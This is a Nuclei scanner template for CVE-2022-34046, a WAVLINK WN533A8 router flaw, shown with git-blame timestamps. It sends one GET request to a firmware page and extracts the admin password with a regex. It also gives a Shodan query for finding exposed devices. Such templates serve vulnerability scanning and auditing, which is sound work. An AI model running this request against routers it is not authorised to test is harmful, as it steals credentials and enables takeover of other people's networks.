nuclei-templates/http/cves/2022/CVE-2022-34046.yaml

53 lines
1.6 KiB
YAML
Raw Normal View History

2022-07-20 19:52:19 +00:00
id: CVE-2022-34046
info:
name: WAVLINK WN533A8 - Improper Access Control
2022-07-20 19:52:19 +00:00
author: For3stCo1d
severity: high
description: |
WAVLINK WN533A8 M33A8.V5030.190716 is susceptible to improper access control. An attacker can obtain usernames and passwords via view-source:http://IP_ADDRESS/sysinit.shtml?r=52300 and searching for [logincheck(user);] and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
2022-07-20 19:52:19 +00:00
reference:
- https://drive.google.com/file/d/18ECQEqZ296LDzZ0wErgqnNfen1jCn0mG/view?usp=sharing
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34046
- http://packetstormsecurity.com/files/167890/Wavlink-WN533A8-Password-Disclosure.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-34046
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-34046
cwe-id: CWE-863
2023-08-31 11:46:18 +00:00
epss-score: 0.22828
2023-07-11 19:49:27 +00:00
cpe: cpe:2.3:o:wavlink:wn533a8_firmware:m33a8.v5030.190716:*:*:*:*:*:*:*
2023-08-31 11:46:18 +00:00
epss-percentile: 0.95888
metadata:
max-request: 1
shodan-query: http.title:"Wi-Fi APP Login"
2023-06-04 08:13:42 +00:00
verified: true
2023-07-11 19:49:27 +00:00
vendor: wavlink
product: wn533a8_firmware
tags: packetstorm,cve,cve2022,wavlink,router,exposure
2022-07-20 19:52:19 +00:00
http:
2022-07-20 19:52:19 +00:00
- raw:
- |
GET /sysinit.shtml?r=52300 HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
2022-07-21 07:58:24 +00:00
- 'var syspasswd="'
2022-07-20 19:55:16 +00:00
- '<title>APP</title>'
2022-07-20 19:52:19 +00:00
condition: and
- type: status
status:
- 200
extractors:
- type: regex
regex:
- 'syspasswd="(.+?)"'